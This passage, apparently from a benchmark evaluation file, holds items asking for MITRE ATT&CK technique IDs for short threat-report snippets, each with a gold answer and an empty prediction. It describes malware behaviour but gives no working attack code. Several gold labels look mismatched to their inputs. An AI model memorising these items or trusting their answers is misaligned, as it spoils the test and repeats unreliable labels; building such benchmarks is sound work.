methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: YAHOYAH uses HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.\n\t - T1071: Application Layer Protocol\n- Text: A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\nused HTTP for C2 communications. also used an HTTP malware variant to communicate over HTTP for C2.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT37 injects its malware variant, ROKRAT, into the cmd.exe process.\n\t - T1055: Process Injection\n- Text: The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object \u201cxl\\embeddings\\oleObject1[.]bin\u201d inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the \u201cReadAndWriteExtractedBinFile\u201d function - The DLL is loaded with LoadLibraryA - The DLL\u2019s exported function, such as \u201cGet2\u201d, is run by the macro\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: gh0st RAT can load DLLs into memory.\n\t - T1129: Shared Modules\n", "input": "\n25 26 ix32.dll ix64.dll LoadLibrary call template dll is used by Reinstaller/Injector plugin (rsXX.dll) for injecting LoadLibrary call into running processes", "gold": "- T1055: Process Injection\n- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has used the Xserver backdoor to exfiltrate data.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: But what really makes this backdoor interesting is the way in which it communicates with attackers in order to receive commands. Python/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with the attackers. We have informed Telegram of this abuse of their communication platform\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Mis-Type network traffic can communicate over HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nThe Trojan will respond to the C2 with \u201cPRIVMSG : []\u201d", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used a variant of NanoCore RAT that communicates with its C2 server over port 6666.\n\t - T1571: Non-Standard Port\n- Text: malware has communicated with C2 servers over port 6667 (for IRC) and port 8080.\n\t - T1043: Commonly Used Port\n- Text: Final1stspy uses HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\ncommunicates with its C2 domain over ports 443 and 8443.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts\n\t - T1021.005: Remote Services - VNC\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1021.004: Remote Services - SSH\n- Text: replaces the Sticky Keys binary C:\\Windows\\System32\\sethc.exe for persistence.\n\t - T1546.008: Event Triggered Execution - Accessibility Features\n", "input": "\nenables concurrent Remote Desktop Protocol (RDP).", "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This is the final payload that has been deployed as a service using svchost.exe. This Rat is heavily obfuscated and is using multiple anti-analysis techniques. It has a custom section named \u201cqwdfr0\u201d which performs all the de-obfuscation process. This payload register itself as a service using its export function ServiceMain\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: PoshC2 contains an implementation of PsExec for remote execution.\n\t - T1569.002: System Services - Service Execution\n- Text: Tarrask creates a scheduled task called \u201cWinUpdate\u201d to re-establish any dropped C2 connections.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", "input": "\nbackdoor RoyalDNS established persistence through adding a service called Nwsapagent.", "gold": "- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OilRig has run \"tasklist\" on a victim's machine.\n\t - T1057: Process Discovery\n- Text: ZxShell can check the services on the system.\n\t - T1007: System Service Discovery\n- Text: Tonto Team has used the \"ShowLocalGroupDetails\" command to identify administrator, user, and guest accounts on a compromised host.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", "input": "\ncontains a command to list processes.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The \u2018jli.dll\u2019 file acts as the first layer of the Ecipekac loader. This DLL file has a number of export functions; however, all of them refer to a similar function that carries the main loading feature\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: has used DLL search order hijacking.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", "input": "\nhas been known to side load DLLs with a valid version of Chrome with one of their tools.", "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shamoon accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task/Job to execute the malware.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: DustySky searches for network drives and removable media and duplicates itself onto them.\n\t - T1570: Lateral Tool Transfer\n- Text: Honeybee launches a DLL file that gets executed as a service using svchost.exe\n\t - T1569.002: System Services - Service Execution\n", "input": "\n, a tool that has been used by adversaries, writes programs to the ADMIN$ network share to execute commands on remote systems.", "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carberp has used XOR-based encryption to mask C2 server locations within the trojan.\n\t - T1027: Obfuscated Files or Information\n- Text: FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.\n\t - T1132.001: Data Encoding - Standard Encoding\n", "input": "\nThe \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This file is a USB file stealer which can be also guessed by its internal name \"USBgrabber.dll\". However, the implementation is sloppy which makes it a file stealer for any newly connected logical volume on a system. This is because the malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a USB drive was connected\n\t - T1025: Data from Removable Media\n- Text: GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.\n\t - T1119: Automated Collection\n- Text: TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.\n\t - T1020: Automated Exfiltration\n", "input": "\nsteals user files from removable media with file extensions and keywords that match a predefined list.", "gold": "- T1025: Data from Removable Media", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro\n\t - T1104: Multi-Stage Channels\n- Text: TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.\n\t - T1090.002: Proxy - External Proxy\n- Text: C2 servers communicated with malware over TCP 8081, 8282, and 8083.\n\t - T1571: Non-Standard Port\n", "input": "\nAn downloader establishes SOCKS5 connections to two separate IP addresses over TCP port 1913 and TCP port 81.", "gold": "- T1571: Non-Standard Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mofang delivered spearphishing emails with malicious links included.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: AADInternals can send phishing emails containing malicious links designed to collect users\u2019 credentials.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.\n\t - T1204.001: User Execution - Malicious Link\n", "input": "\nhas lured users to click links to malicious HTML applications delivered via spearphishing emails.", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64.\n\t - T1027: Obfuscated Files or Information\n- Text: OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to \"openssl\" and then write the payload to the \"/tmp\" folder.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: TEMP.Veles has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n", "input": "\nThe unique strings mainly consist of \u201cMobile/BADDAD\u201c, \u201cMobile/7B405\u201d and \u201cE9BC3BD76216AFA560BFB5ACAF5731A3\u201d", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host.\n\t - T1068: Exploitation for Privilege Escalation\n- Text: An older variant of PLAINTEE performs UAC bypass.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: OSX/Shlayer can escalate privileges to root by asking the user for credentials.\n\t - T1548.004: Abuse Elevation Control Mechanism - Elevated Execution with Prompt\n", "input": "\nhas used CVE-2016-7255 to escalate privileges.", "gold": "- T1068: Exploitation for Privilege Escalation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host.\n\t - T1016: System Network Configuration Discovery\n", "input": "\ncan be used to discover routing configuration information.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.\n\t - T1082: System Information Discovery\n- Text: CHOPSTICK provides access to the Windows Registry, which can be used to gather information.\n\t - T1012: Query Registry\n- Text: FELIXROOT uses WMI to query the Windows Registry.\n\t - T1047: Windows Management Instrumentation\n", "input": "\nhas used to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: copies staged data to removable drives when they are inserted into the system.\n\t - T1052: Exfiltration Over Physical Medium\n- Text: SPACESHIP copies staged data to removable drives when they are inserted into the system.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n- Text: Mustang Panda used custom batch scripts to collect files automatically from a targeted system.\n\t - T1119: Automated Collection\n", "input": "\ncreates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.", "gold": "- T1052: Exfiltration Over Physical Medium", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave\u2122 wrote: \u201cHey, good job on being the first to release a plugin for Imminent Monitor\n\t - T1125: Video Capture\n- Text: Pupy can record sound with the microphone.\n\t - T1123: Audio Capture\n- Text: is capable of performing screen captures.\n\t - T1113: Screen Capture\n", "input": "\nis capable of capturing video.", "gold": "- T1125: Video Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Agent.btz obtains the victim username and saves it to a file.\n\t - T1033: System Owner/User Discovery\n- Text: Kazuar gathers information on local groups and members on the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: CrackMapExec can enumerate the domain user accounts on a targeted system.\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\ncollects the username from the victim.", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.\n\t - T1090: Proxy\n- Text: Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.\n\t - T1090.002: Proxy - External Proxy\n- Text: APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1021.004: Remote Services - SSH\n\t - T1018: Remote System Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\nSocks5 Proxy Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines", "gold": "- T1016: System Network Configuration Discovery\n- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ROKRAT samples used during the two \"Evil New Year\" and the \"North Korean Human Rights\" campaigns contained a reconnaissance phase. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. The source code only considers the following machine types\n\t - T1012: Query Registry\n- Text: Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nenumerates registry keys with the command regkeyenum and obtains information for the Registry key HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can compress and archive collected files using WinRAR.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Turian can store copied files in a specific directory prior to exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nThe results are Gzipped and saved under random file in the temp folder.", "gold": "- T1560: Archive Collected Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the \u201cCommandLineTemplate.\u201d Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: JHUHUGIT uses a .bat file to execute a .dll.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", "input": "\n!ExeCuteFile Executes a specified file using ShellExecuteA !DeleteFileFolder Deletes a file or a folder !SendkeyLogToServer Uploads the %TEMP%\\Save.tmp file to the C2 server !DeleteKeyloggerLog Deletes the %TEMP%\\Save.tmp file on the system Table 2 Commands available within MPK IRC Bot \u00a0 The post Magic Hound Campaign Attacks Saudi Targets appeared first on Palo Alto Networks Blog", "gold": "- T1070.004: Indicator Removal - File Deletion\n- T1074: Data Staged", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Whitefly has the ability to download additional tools from the C2.\n\t - T1105: Ingress Tool Transfer\n- Text: FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.\n\t - T1570: Lateral Tool Transfer\n- Text: SYSCON has the ability to use FTP in C2 communications.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", "input": "\nhas the capability to upload and download files to the victim's machine.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program \u201csvcmondr.exe\u201d (8052234dcd41a7d619acb0ec9636be0b).\n\t - T1203: Exploitation for Client Execution\n- Text: DanBot can use HTTP in C2 communication.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nGET //<5 digit number>/<4 character string>.php?_id=<43 character string>= HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: Cache-Control: no-cache Figure 6: Sample GET request for WATERSPOUT backdoor Although there are no current infrastructure ties to link this backdoor to APT12, there are several data points that show a possible tie to the same actors: Same initial delivery method (spear phishing email) with a Microsoft Word Document exploiting CVE-2012-0158", "gold": "- T1010: Application Window Discovery\n- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After this file is copied, the original \u2018Update.~tmp\u2019 file is deleted\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: The attacker used a temporary file replacement technique to remotely execute utilities: they replaced a legitimate utility with theirs, executed their payload, and then restored the legitimate original file. They similarly manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returning the scheduled task to its original configuration. They routinely removed their tools, including removing backdoors once legitimate remote access was achieved\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1070: Indicator Removal\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The switch statement checks for 19 cases, between 101 and 119.\u00a0(Updated to correct command IDs, thanks @mykill!) Command ID Function \u00a0Description 101 getInfoOSX Gathers username and OSX version and responds using the encrypted form of the following string: \u201cMac OS X \u2013 [OSX version] x64
